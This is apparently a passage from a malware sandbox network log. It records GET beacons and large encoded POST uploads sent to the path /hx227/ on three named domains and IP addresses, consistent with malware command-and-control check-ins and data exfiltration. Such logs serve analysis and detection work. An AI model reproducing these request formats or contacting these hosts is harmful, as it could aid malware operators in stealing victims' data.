  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.khamattqy.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.khamattqy.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.khamattqy.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=ZHyohDpQ27lXf3a_fquNVc5FhM8OcTvj8S0rQgXfiyDxN98BQU6776tAiU6JSAbdFxx_XIhrwl~Qd1USDblDjzga~9zb2rnMVC9HEAMklsRVZWxti7o5YgoYuljmDbjDrh59V5CU4_aBGSSpTOh_7tqw(x2BfCJqz0Hz89VKWBIwZPi6RDh3ralo(r83FTH5Jz6dcWH8mqrypztvI7(femsQl9F8CWmoK3Gr70b3HTI3bwVEkUrNbgEbBDSEv90_0sZWu_rQTA(JJqFKu-G1kh9MD1vqm6CtQzS-PD9FzBOHmyXYgGmqxvD3dwJyvLHw4Kq-3mkd9aC4nBiH2owG27BmJJFDvQyuXYMktM3fHS3DO9kC8Alroocyzn526UKe3sJWLJ4JH6EPReKDAEqwgYnVGxjS63K2pwmTDzAWUYQMIHZKwd3U1yu86igjcP07irSkufTa82DGb9gWYW8wp5VL8yheBzk0dQ6qROrItb6cf5op~cUqeH~gKeko6DCqRn(u(jlYB1T0QA9-WvlC3czDrTupBnVgWQQioZmQPgSiE_QmAM8TpFLryWd1e1lCynD0si1iuln9Rtnts30lE1FdJEGUt969Jx~81z~tHiT4yhqlLcxXCaSwOngxY5QMaVSbzpBlqa0vhz~ds0VRQQ0_kRVf5GTEbq4XDwQbIKesV7IagvxLr8wRBqM3p_LOeXYNn8j5GNa9uiMSfhpfevw7CD41bOqwg5FRGfc6Vy(RH9mDrv4Xt3j6HX0rNkT2HIMYzzl8KbAx6wMRuLdPTxESahXOao4SHJQT5sQ1ruIy42FA(VFWAjg8QTkac0t_vAjcTJ3w1uxIFZcYGT(ZjCynKFzdOH(7E652xIghIzL2957nV2OJOCUs2glXsovIPVMrGNpZ4DQdOdksKj29PQOc(8gtyaD9~6OUX13zjBZ5MkVRWrKWqRH4Q_XB26dVg0PcSlO_jKJrJPDERJ6_zOvE1vaMP-rlmtRZ(G31nLIS~Sp8CHbzA6XUIe8fh1Vi(JgNM6sARw144dm_qfFL7MQ59NAqQPu42NpSNFEuotR4mI0CX_R2y2Q0eh1BSYijhjP8dktwskG1MZJOJ-GiO4YgnWwLLTZ8Fey3lI9ZU9iqbB~GFkruPhaPVIobpj2hF9NSAk3QKa9foX2NMjgWCMIk3dNdNy1c5Q5bhAn9K3qbR_qoOnrioMjr7QBZ8LqujZR5cqyvwVKY6g5mAfSeIcpDl3XxC2fBFkqxwFCGaEEj8YxRUVX6tTMwOJrxiEtqMps8OkptyDRypE4gXCVnX11xHCCbXNDxoXEsP_nVTcHu(dUJG5kW9iYGd1IJKEn9MHgZULn8d_tg6dzx1d~hrOvvFGPlsl3kH_Ra0wWyB1oiY_iHpoAlWpQAfWlk(ODXL6SxWMvprcBMcTol26N74y(LoUTp(9ybZE~Sb0qpMP4xpK(-xihHMCiIfjl951(dHZwE2tieZaThxPPKWR2pf910SEISjcBdQhe06u4DSo1XE_ZIkLpAo6VlNecq0bCy0171J_e19_b6BH6mI3cmTymLk51-rM59Z9(HtQzfuHS-P15RfVlI4xk8EO9e7HVruoszmvPNATvhgAPvfBvcyFqurFgFvzFF1oQt(mh3l3HX5vcFdMqLml4ysqzmdcNCYsvPkDlFP6a-y-gd38S6p5HwoHxY6X0RRDLpWHkPh-NbD4BjZxKb8jaVZRt1Y9J8G_laDcpDrCzdnmLEqj~EqK04ToLfye7qTyKk~E6js-2v8f9I(PNg(DF5WivFV3kCTiMHWagKc8RUeMhAq95MBx1CD-dwKJg8GZt9UnlL~giMdIpfLrNWBCZMeG5l(M6Lu7QVYeh9AQIYoxeuviMSrvx_yqIb~VEYFzLoulY9i7HjcB3pYLYnZIn63qdg9yWmF7c-9i6DwIoV8d0FEui9MUFdGCZvfk0qtEEBO_NJF07mw4A4eP8KBZ9VKw489BErgxig3xTeS85ijdmJzco46ZZjpNu05gbJe40FGtMv3KZ8TKIhbyaZ(3iQayHetJafZBfcmjTpU1WmFda8x-zATYBOoZXCHz6SGU7cpY6KMxoV9i65DKSCB4sMDw(CVWR2B2kvPJBzqpt4755PM1NsYkT2YJVgSuaN~jZ0Z5LPjiqqZY2XJDtrxsZfZCZZGdgCe3cjzysNtn15\x00\x00\x00\x00\x00\x00\x00\x00

http://www.khamattqy.com/hx227/
  • Hostname: www.khamattqy.com
  • IP Address: 162.213.250.143
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.khamattqy.com
Connection: close
Content-Length: 57282
Cache-Control: no-cache
Origin: http://www.khamattqy.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.khamattqy.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=ZHyohCxulrgbb1jNI4XIacI1zag-DUrcmA9IQhnD2GPjJcMBAim48atPmk6KWAXlIGNnXKNNwmeXIhILUJMDrDcqht3Ch5vPbBBbSUQkr8NXXlY_upAlFUAehA~pKIHmqCV5S7K8qKe8JTSFQtNzx9~_riKPaRsZw1G2wZ8WKSoEIMqERClezK0e1ItLZU3HCUadeFXSzZjwiTN3PoHiPGd0i45_OlvuNyyBkFPMLyA7OS98pUvEFB17LgzDvpEq3utOrdvrABX_CYNc~pe9kRspPWPqoLindRLzST9-xB21tSXKgGiUy4jBQgJ0ipjv9uGm9DgNvbS4mnuQwqYZqLA4A5VU53bgXZ9ns8vfGXnDdt0B~AlriIcwzn5A6UKz3vpSKJAJB64JTsyJVn2QsYmBF0CP~2mepxuxETcWSp0NDGJOh5DTtnmswCozcOIww6CWq_uU72DBD9sFcSQS9coRxRxPNjgSZBevRpP-scyATZ9cu-ZlLyC5OaVu0SuZTDX-5C4lHznAQ2QrbtJW2c(SzAa_GmlPHRIDoJSMHCr1K-s1D68E5Uj67Ex7cU1H70z_hy9nplqjVez49VJyAncgAEqbv8yTawGcyULLDF7Z~zKDDsdCG4bJFllINLMFSViV~toVt5MKtC2VvUBxPDdOkCxt6ECWVvB_GT0uCJyRZOo4rvM1hO5-MZkF(fj6BEYyhff0WPqcpQwiDhN0V_ZCCToDbZnmg5NVGsw6SzrRNeOArPFR23j8DX1qCEfUHOJHyyR8OYog5xMf4M1GOhFfJQbReoYvHL8H6ssDgIUzpHlM6VFdBDcHZ0shBldZvwuBZYbghcZYSK0BNSrUnCTvKlvxFWzMMexw0_EXDSS3y96SGnm7KDF0(CEV7MXBJgIvTNMtg1csFOsaLBGbDwzy0aJ18obRt73-RUii6h4kCAF8ZbWOuEnFRKrd3bhZiCPDH3ylvaNCP6boVOzRwfmQ1PuqQsLW8OYY81XYhIpC4w5QJn2lfPa7J7NqnUds2uohX8sjTjJN(a6Dy48W~-AN(dFUZeKUz6F5K1sb7f8Ik7ZATsIjwVhhXT5oaZr4iUy2EGMovFuQBNJ-TKPNI7IVpisAPSYzFa3OlsVZHcaqdWCGMHiaBwmdW5ZM2iTjA79UGHPPZs5CsVyEGmUcQOtz9PBUHVsa0Ax9pTWPKx2bRe2XFk(f6-GtzTQGtLLunq5tJK2Orxa04ipVZYuhDvIEpjHSDmPEeGu7~jX8ZWAz~4ZEXW(NyT4uCYTdxVcwPORxB1ds5wZc8HUmGDRvZ3lHRRe0L5v5tmcyA92jCLb4gPhbWdBV0gcvcloWEmKBI0k-ep76aKNG~-vl~4zOvoudMUb_kQn0NOFH3RvuBgwqQsephbwkWIpaUmFw~8nCMOKiA-vUg8tYRDsii6khgWnTm3Xxz52KTky6em~ZOYEbi_vz31FlJCiVWz8mywrdHYYAs9GxftDrwa7_VTnJZ9t3ZmRPzNdxbBa9p9crUKl5esgln7hI4Id1cOgIm-61lEu7Fs~gyovnK3WmKH9yW2qZjvNildJff_(bqRfpuE21MUBeSlgAmBpgIrxw(n5errMs4OH5Uxe2k1LvHE3Y7mPvoEMcuyFB(tA-pH1ZlDfLoM5aVMK16k8r9aarKJBbVMrdijprVoGi3sIYoMORh9bOq3x443hxRzXBWF0uivBcD5JgMz6U8VuLNkJIZ7d0RIpmB8JHjSXCsED9ojPSu7xVFeKSy_rte16EpzbdtLqivccZzbs-(wxCYznYdl04LBp9SbB4e7hmEcdUr49lTxpPT7JxMswwHYVZbg594lOFLqJhOuFTJyFGTEID1fu-nv4OOuwUCi8YizHmoCAM9-I0xqUkzEE4Phud73wvifTcMi3oYK8DVYnY7vxKkBvaNZ4w1CehktAo(f8HbOq9HWxrMSBCJXYB13UNavUiXHHj29E6QZ5TQZZ6KD4R2kkUpSOh5XDMdPtnvdaXydU_gJhbosic5hyVQcJlUNAq4eVrRd4dZmaw5QzrNTPywNDqUlHHnynZXxOHBdKG0eXfA6BfvI7wDzbLH2PSzOu4H0hzxSPpAPmCUvIZKAa4Ygl-FGoUJ41Iw4h968omUW5bV1nxbINdaMO3xx82W7D61SKtLvCRaCc1t_wfWmdSLN0teVJ8oUxCtSg1Mmb6ibVY~IUNxpNtL0vKj9GWTS5R1CuI3fyX8FN4RPjQLfA6ic0iY0~birppivMQbnjysWnTwCS_H6Lxj8itasSi4JY3bEM2ma9VoK3b3umsArd8Sfu8LOnv7S4a4I9XhV2W7pAmR_RydAYhFaYEsQMgm0Wa~0IqonNzmst46CH0jXf-iIdi5Ye6xgWoKx(35BjxVXBfLspeagub525btc0

http://www.kredit-hilfe-gesucht.com/hx227/?xN6Tir2P=4G7jrqAbeWjXQec1rW8nMAUbtw6Cz/YSi7ZNVv8LBkm9bGwZUddzwvf5NIY7RUoqeZDdA1+8&9r=2dOPG09pd
  • Hostname: www.kredit-hilfe-gesucht.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=4G7jrqAbeWjXQec1rW8nMAUbtw6Cz/YSi7ZNVv8LBkm9bGwZUddzwvf5NIY7RUoqeZDdA1+8&9r=2dOPG09pd HTTP/1.1
Host: www.kredit-hilfe-gesucht.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.kredit-hilfe-gesucht.com/hx227/
  • Hostname: www.kredit-hilfe-gesucht.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.kredit-hilfe-gesucht.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.kredit-hilfe-gesucht.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.kredit-hilfe-gesucht.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=wk3Z1OtVNEKnFocFph9zZFw-61KOzPkM6Mc_XrkSIAuiUVcCTb5Ot4buBesvHWUiBYnoIy3nkO22ItSlorqWINBGn8AWOmsF0XSKvwIIaweDDcGcR1drrz7VuNY9DDx7OGMLlrJlZhqt7H59jY(j376jXy3mmyP0PGEeOogqBZZgUIYUqQERz0L8WJyeYiQxNJWjBzBuNcBjPRyvzrSZCqEwpM79dDvOzU68U5BTP4t6ZjIzHZxtle~OuROynoewlZHZcO6PTZUVj6LO7YbwN_3L2f~HCnz0QrKlrWJcw6HDetY6HpUxdxCRoK9Axf1Dt75h157LrDpBF9Rezy2K0P0hELiOW5VtFGOuYix51SSD9cLMRWfsb5JZh4IWzJGvE18xjTTVEWC4VZ7mjx5RxIbcCvWsUGbPRG6QOXxyIysIUsb91wZOIoQ8Hg2nDpah(Bp1OWjfBR47Ggh8eMM4gN4f8IAIAVI9ND7SIL1uioSPCzubK3QslkxcldVFB42vW71gQ56W5EfLYSP0x-F7cUDZbyhnqR3jPJTTdKpqQ6gHSY77KLImvlCji165DG5bO-B4Ifq9onVKXoJ7bXy8tltUtcLwqHEaitSLJe4jFZvICZxdGvrQt3xdVyVsMMIhT6MPWmR7ZkxwbIjDgm~JaNBG4NbIvHjCJI2sScMFWbGszaDvWOGa2h6dwkRTa9pJQ9fUnG6xdBhHMcRZ(JT5faSIsOPSL6Uk3ORndkLiQiBkIuW0G4e2BCS67CMsWFa-dnDkOQ4A0RlCUJtbz_p3Gbbi6P8ikiAoeLZBMxfr5ImA~yWt1zoTmBttjDB5gVrwMP39JvtuHPKI9m7iFhWu8BsQG_zYdiwoyumA1qaiiE(ftPGn557Zgq6rA8hqg3l7FwESAm5NpNwlBSRylOLE0gLQj94uvzxputLq2_WOp0aY2xPnGg5mMpmasgaedDBJZqLZQUdwAIzKVtWyh32BJSXfIuWvBk5E~je4m9L3O1SgcvJlQeJtNDsjbPha6tI2D0mfy9jt61MBv0RltDFih05IH4senf2xEtK3k4fWTZdcUVKpMr76wGkYiqIKmHoSkH(438ivX4GHvwz7EAaKBljQXWmrE4tm~AP-zvFzGEQnTFpJsLqDHdq8RptV~y3m~C0pVRPtuUDWJ1oslp1HEerVXd7grTmb~_coppqo0qleoPyjZQXX7m1jkOxY0tKXEB5HhVmZMBxbQUm5LDD-LRiJuU~6Fhbq8c4VPh8IT1IVHUBxU0T16fnZcnF1nROwUJpb3ev4LzuVyd0oCOrUZIJ9XpcR5WMxqMPLihVxwFqV~DiyBXqJYsNhEMLc~Ym_NJXhDhQsbq3B6Q3QXepjZ-vh5kmoQb7MrYw5HcY2eJnj1vgOGdgOQOzwXzrsji~unGiLKrIF4VGPopHOWw(ZwIep~pLbDBDoX1LwcrCHRrYYqxPZ(iYNwcop0Ra8vtmmiWGCA5y1lQL25ouJfRVfMyashhKXswlFaa1NANt9NlcCBNxRSTF03CMp44JGlVQBy4E_E8eEl-3aDEC8dkgTcNcOXfz-I_IIxKukprAE9DDkeLNs~qZEUHhgFxau2fxFG4UavwSvPmqX23sXsEolSa8zhevQgfasHLNPyAyawd(iqW5W6ajaRo1G70fF3aJb1g(P3KcA0e72BF72y9iW3K0noorZk003mBfSOP~q3poJq7v8vGDYf3SapZanLOtor9QHICLdiqFB~-sUwZZqjIT2TqmRQ-SMG0JbwlX5OubaqgENt3nOjqo9QlD_EqYFoDKFOUNLZcup9jz8lBZ4xUtnp9TTjynMYVo5lqNNHR(l62L_2DdJohu2cAPOC43t0s8dI4WVMFQgPr4i8KM4AjEF3SDGQU8ivxar6v~wjO(8oj5ibX88l7xtfCBfssQW7GyMOPg0fRBI7Nt_gGvb9LxFJqJmps8URfRmjYeBQGGdEmq4CWwWThByCdzTtevUhLeH6z1awKuy9onOREFwSGeYJn1wu9abLdL_(UvVIa4wxE8IdV7560psLmp6eHpxDOqX~V7E8P820QIN9TRSUiuI5tGFCWhJ75YJOyhRqLjYbXvEM_6eqfmvDt5fYWzRrjs2L8yvHfqmxeJSGk6cQloBPOo2UmVhcx~Ecaz7livoI5DvBoo3jk4ygEMq1DWwPih_GkwEg8Aq\x00\x00\x00\x00\x00\x00\x00\x00

http://www.kredit-hilfe-gesucht.com/hx227/
  • Hostname: www.kredit-hilfe-gesucht.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.kredit-hilfe-gesucht.com
Connection: close
Content-Length: 57282
Cache-Control: no-cache
Origin: http://www.kredit-hilfe-gesucht.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.kredit-hilfe-gesucht.com/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=wk3Z1K5rekfhPOIUjAtjUG4pvVGUwdEzkrhUXusWElz7fWECRZhJh4acJ-ssDWYzeYOlIwbekOu3GsikvO~BKdc3l88PEDgG01vRq14IDA67HO(ATn53nzntlpF9NTRKMkgPtLpJdgi31G4qi-j_or~kOFnsmVXKODxBQ8NxCZtUCvsiqRAk9Q3sD43mEgJGP66jDDZEC_JhRm~3w47pSO5WqML-RzPJ~yP3Ko0lN9R2XQQbXplyovOjnyunn4jgmffRSMvsfOUnoLqx3Zf4NvHh~8eHVk7ITuW9lWIK8afPVNY0HpYpP2Lqkq9C1aEdn_sk7YLiqyZBDrsCmkiVo_0uJ7TUHeVqFGe6ZSJ5nA2D3cbPXWfsBJJhh4IOzJHLE3c1iTbVCWu2UvP7imFf9IbQDuWIF23nRFaIJ3VyYyIXWJH5lChJQcZ3NGviDpft~EYeZzaHAR48Iw9vaPUat8JTzrR8CldaNj(JPpliwbnMcQTmOFcoiVh7hdoCc9(ZXbwYEomu(GfBYD~l9_BnAk(PTR19vRGBds3ycZ02fYYtcY3gN5tlrEKymHWnFnpaIPJ_APy4rnZVBJEfb1Pd7z4vq8WOoH88roene5NWPaqBYbRVMeGtmxFRcxhfKtskKL8JckZQI2JrT7SwvjutFa92~dH6oGbrF8vCV_ZvS4KR5v73NO77zBaBnX4wZcxXY-em(VqGeSt-F-tlmrPSdt(ah6jkLtxy3OZjdUfiTjVkFPW7I4iLbCS8(CNublXpdlzgAwsA9D96VKVrlIBQYrb94LstghY_eJ0YLxLB0rWP7wfk0zoNkgR8lDFKkV2dP_ztH9o1W5nW41DtAE2T4CVFUP(GTz8P9PLF792yqlHTvvrSq4zr99~AJY0oxVI7HiMOE11e7u4uU0Mnis764AHzsasxhCRd5tDA1eCsgneK(QjzEwNAGY~dsRyCdi9NeZvGb1JcIbfrUs7Llwe8LDuJIOSFNFR310KmnLDWCEH2bNYgMvlGQQcZZqRrq4k8KjOJ0Ore0GxptnwQiU1GomZWCooVmeyRaPbphPjzAu8kXg6BDe7e2lUul_RooC84sXf5sez1RZe-tFbtOCHGVSXhE2OwVvZo~ELMyN5zG0YnBnxJhqW-DoDjRbJD8hrr1k8rT3bEoAzLCVUxrpdJAIiZAcvl9gKCu_VLuemh0pVeos3Zdw7-6n54jvJU7dqEAzdt6VzJYjZdWXGaOBeMf33ergmBFwrnhKwbOnBwTkkFEw5eV2rCi_TxU0VZlSzsIfl3ktzlAECB(K0mG4DqSJBhcucE2Ug5v8WC9zF41mKhkhWVR2aldLkzD4HT3OebJ-mIazMidffF1QD9PMpLV43YnkaIaouulq8eH9QjT9mv44gZKvA5RvLxRiLCkRq3wEOYduUkgh~T3tbJWQmR~YCh7rf9LD75ZVHIXfCVT7gyuiLq5xpHxcoChRSggv2miWuGHZXvkjfg55u0aTlyFTypkgqztxJ2T7RSXvpNeSgoIKkEfCR8nAkf87d4v38C35gkFK6ZnM(-bEu8bHpHGfk2V5KhXsAm5pug8bgM9GrvfrlzzaNDK3tHWg6AkuVwQIcFqBKTEUKpq0EXmWMhd5Inr4nghcyoe5pckzf9wtj2909S97Dsd5wNqFmCy4Aw(A6ewaZjvJziXmT589uH5LkJq4r50kBX0BaXON~X16gOq6Xzn3rbeB~U8oKeKIhgvacvECrjq5Vgwck959dJm9(GWoiZXevpBX9g2i3KObGVu2dBilffgZ8WRULuDcEBnSK4ZGE7ffyL~xnHmHdj40hgqonOswK_bUQNrplVIzHG(FqIxHRI(Bi0WFjjKsDY9_gFEfySL0cgdYwp6qRnRSgTokm2dAhVoD~Rr4aLhsXT4QpjbTZNprxLLBwu4-Idj1WSDuFTUiV98LR9i3Xb3O5ZePUGsrc_LIt6k52IRk6NI0q2LF1LWy9dCMr-7P~wjIyK(1tEso6zkZDcQBthYH6wFjklu8yuSYLCp0zQU7AjqTMCfAbQoFtMbg9GBm0EccnD~B7o9Oo5rg4vojlRHEqR6-enGWBL7bcTHXVnz9TzVnzZSOie8t7lGO9gVkjZhx5GMI66JbylhoJ6MEn2f10eTfxNSlBHXgyfd_25gA3vIarpZ74_60trrzoTx3eLOQAhahxQi7xpD34hGWGBtozm7-g1aIYB9OCO(dLNNmz_ko(xlOEI7UlAIwTcAEEaCuMhfWO-Hg0cgDjNdgFaoy1iK5eSvkAv8C1uamJN9_IJ4MGios6GNXElp5jCOcmVqIctkrV5w0eSzdoFGoSoMtfXGFI-tlu1XqUfibroDC1jULKZpDMXfztesNlKV-1BAQ

http://www.cqpsds.info/hx227/?xN6Tir2P=+VcaFGfUpj9nu5i0yjt8eVOmpCdC+dSCnM2kQt5S82iAxxQZEZNsYCBs37hgHVtvggrtdcTv&9r=2dOPG09pd
  • Hostname: www.cqpsds.info
  • IP Address: 107.183.130.155
  • Port: 80
  • Count: 1

GET /hx227/?xN6Tir2P=+VcaFGfUpj9nu5i0yjt8eVOmpCdC+dSCnM2kQt5S82iAxxQZEZNsYCBs37hgHVtvggrtdcTv&9r=2dOPG09pd HTTP/1.1
Host: www.cqpsds.info
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.cqpsds.info/hx227/
  • Hostname: www.cqpsds.info
  • IP Address: 107.183.130.155
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.cqpsds.info
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.cqpsds.info
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cqpsds.info/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=23Qgbi6LxB508OGduzsmFwC8hXoSx8TI7avIf4dz~iqcxh8SR-xmJFZu0-cOV3B7wizyVZyw1l6XFRD60vRXfHC7V2lRuRSI~ohjLUNokwu5NENVGxUr8LkVUvJdB4sJPvIYrSqtVbXC0XthPWROgx(_gPzhaFmsQDL12RAMUMmfteFtXzHfFho7(4yTqHn9CjcnExpO8xYSbFJpmbTDLnYZ3ev6ALnZJv6L3MRPAhLzRAWrgIrqzxvm7qxn~gLCB17zGJTzhPTZTNZKP1yB01Ff4RT_y2c6~jg4H56479JfOYBqatBsEBLWAAPRVSztXHlWoTqrNXj6Egz9pLnAbueUOGRybdTXtfzh68Y_tW13ARZMzODXgrdg6-99ysSYTQASD4jhauH3B1uEZMdp9O9FYBajVBmfpR3SAn4Tu9IRrK2OKHska6Q8B57wV8irUZsHMQkYZCDt5lVov3aYCm8GD-LDkZ3P83n8kezHIZnegCzZn_jMmOCrbquLF8iF~fqxfy3aMo7EIkM6bf~gdx9wZTsYGh(whxZtx53INE3R0KRge1wld9d9lWMKZT2lklgxzTcpV8sZwgz29eDLunMUzkqEdvooFGT33us_Zq3shrIgP9PLq2DoSh4m(-25uxUQVh6ywWEFR2UwlGkXPwTOkTcgNY(jqW7OCGo1PYSFqpmrK9JvxkHXNyoUGi2XDYcM~oygfKZKo0733deeo_7vMbjOdKP5JfW6L51RrUceeNofWGiCriyVsqdEgOfCb9PO(fsAwfD7oOuuHdjyVJ~_614WfS0vt1l614kYpo6gcPpMfMvPArYzoAEC1NF6Te2Z8c6OcTEiHUw-M-PmJw98JOZRVMoJjSnJvfmPLe5QBjESoZmasEGyOE7-VOlMm3ervn3-YE9oPU78fkKHPsmeCVyr5L9pgUiY3TVKD7Wokir18aVoGYecfzhtl88jcq6UbP4Vqd~JSrlOt5TWAJ37HnV_3jV2wLVkHGK3atv7G4RP1BuGJkRroS~kF-k9uB~zFDNa(P5bWmv3DFsuVCcqCyfVlWLNFsH9lD2jP5Eg~hRpabs841C4J7j4As9R3X04iyK8x-iaOwZqwWI6hp9rpFR79Ya_LogfxhfP5MHv8cpbIgdSYdDUAGCOWB(2ljXC32XjV1NgcVphgO8p(uqjEfTImo(zvY7jW_YzGlVdM3i2zwumxGBriRur8V6pbH(btL7m9j9dv5ySjeTVfv~pyVtBy-dJaKPsrHOQLQX_HRAI~ThfWdh4Z3kWi9IqlqkR7L9unKHA4kqbtESfRB86bdNmlFQgY33SXNFGk5WI335F3uYT8ZdgnZjgmCDq76TkyeHWp0AXbn4lLbdvIza2a6SWQH3-1Bu3(Nt0eAgXeDvNEsKoRSpOeDUT2OnecAwQ(X5GKLi1mUhEbzYg4vsYOHnGjc13fAcbrXYl4G8DdBovjn32o_2AYSo7lx7vtI6VI6En9pVDM4sp4Ke39twUM1MgAnk36FrVk3jvLEfEKCWseC3XesY4ttW6Di7Kd3S2rmzyhvt_FqiWuab5LyNeoOJ3a5ilQBvjoqDVgcqS5Cq92dctVKKxRVw5vWrV71OU83Ap5_iGsilZrACyFfLO0aadxO~E030sLVvryCE9ce5Gwvt6mBTF7VsAwmHWpbZtdcIq2Z6MCLaucdaqZWv3nDEcP93QCuCR2r0H5ye616w3pbgy3vayt-HypVOFOKu5aA9nHMRWGjCasjmNXyBCJP5HU5RkICYczAG1yLiQsTZUHxlbHQkq5yR1Zs8EpljQSR539Mji8n(eLqWfso0BFEOJSOGKKy8EjA6b3da-~_wpaBJoqZYFB2SXrL29J5UjJW~08RmYO04pTd5rRdzr5_ZofnGOD5vgE3hAm9gZOUnKqLUG574k7tno9wcMCxjm8XMVwWaa5KTr3V1Kmo4ju93Y~5hb99wUx77ad9vPaAy4~Jn72tYpOZRBC973HsjRMvYLkti_RF~XORjhYl7QuPN5pfsOhvzSBdNt~4BxXKuhmqi6hyoaLt3apjrW9mcyDSqsJwaU978qtokxvsLD8mw-YE(4E8jbJJDnup5WlmFz2lzp4xZO4kwCQloyAI0XoKtR4pnZHdxtU-uHIDOSJE5z8dxldTYEcweDQRdROC(ERo8b7TMz5-pE80Rdayia4i6jbQgE\x00z7livoI

http://www.cqpsds.info/hx227/
  • Hostname: www.cqpsds.info
  • IP Address: 107.183.130.155
  • Port: 80
  • Count: 1

POST /hx227/ HTTP/1.1
Host: www.cqpsds.info
Connection: close
Content-Length: 57282
Cache-Control: no-cache
Origin: http://www.cqpsds.info
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cqpsds.info/hx227/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

xN6Tir2P=23QgbiO18R9p4N~i(mJrLxzEpHlf4Ma6ypXqf4N32H3DmCUSAtVhEFZvy-cPR3NP5Qz6Vbfl1liUOT7_jdIfF3fIaQIX5HWX(Ld3ORxogAa_TGkREgY_zLobfOxQYfRnddEc8nmRRZHz7WtFdExKuhr4osPnai~gRHnt5xJIVJWrmullXxrmJAYGtZrtkV(DAQwnCAhe3SRUUms02cv6bXo0(-(5O6HeItSbvNVkClf3EnzSkofxsxeEjb4n~xnXA3fBFovAjf3vY4VYISjM0F11ggL_8G88yB4wDZ7W98hTAIAVatN0Cm7gDAPbIBX-dH94hz6BNiP6Wyqh44PbGefUBGhlftvmtfCi1sQ_sTd3TBJP(uDX7bdm6-9lysT-TSQeC4rhP_LxAD6SJ6Vnj-9BUga9DCizpSHBAEsTvtsS~YOCLWs7Oq1nKZzaV8uYVY81GVkzYCDisFIyryu6LXNAPZv4mpSo9Xzzk8iILYrw5SOmxZbIm6OMfqLYPozzs8WhaT6tEOf4JXUGY7mORRBPTxowNxPfmD5AjarcGm(76Kc6JXFnLsUjoFgIbyGkmTx4mT1jW8QK7xOM97Lxq1UglVGlfuhPS2bXgOFteJzB5u8GMtj46ELaLTNR0-y87AkSfjzE3xJ-ZBYOtEonAXHimDQ4Ic(G3jDtVwQAcqe8mZPoR8lE1DzhKnsmWTP2LbsjyvXiYbc0vF(hvq(K59qBFobGd6fQJZOmLJhRqU4eVsoYWl6BjSyPxacbuuTFb_~Xw_gA2onq6ZSeDP(FI5~npBgJbR8St3JU04oi4-GjXeJXTsvUBOZNuB4PxM0dTNbU3NGeUxd_CFw_H7nbNxcRKudPfYBrpwjDhPWfTMJUOjhpqcyShn~nb1i7SfgOkDaNt2jHTiZjFCHORg2fNsyleFS05Z0OxUqh1zgrY-eAuCHh8Jg7CN6RKSJDlYsWeY~bA7lU1uTXRq4_p7vrBYPIJnQUoyNF6ZNuKXCsWcnWWopn3BCtECUCnQzfUvsn2jiPDzt55Yx6YUPbMSUCX0weS0DekXeYI8~VpRmCJoRS9T97VuUY~UaWAOzFNuNB6AI96Q780a2VJERW5XtvjqdevUpa5f6hLs89xDjP(8Pv9PhbBFUmcseJARi6VRLruBDE60(4GWkuNHt4vPFUtsuJAteIo_HuuIyAB5NcGnldCwjO3kn2wCY9lyu3~Gy-f1bP1r(HxyNLp7yht_2vLtub1npiwuBcWJLEqE3iLA6CUCRcsAZoUtkhMWM6k9cN59ZNjogszJPu32mR7nPTfDtbNqk-nn9vcHOaTeUwv-y07R4pkcwZ0bJJjoDvoQuB(NbD5-DQglUhUndmD-pHE1aXaIH1WluBzgam(qFYTxsfGATWbOqfQzwLbQMP08fPKh0-12R7AbGpoEtHX1gP3_wQSXHksdl6VgB2tFcz(WFYW04mwQqX7P2dLCh6q3HvtIivF6Q2z-lJVJs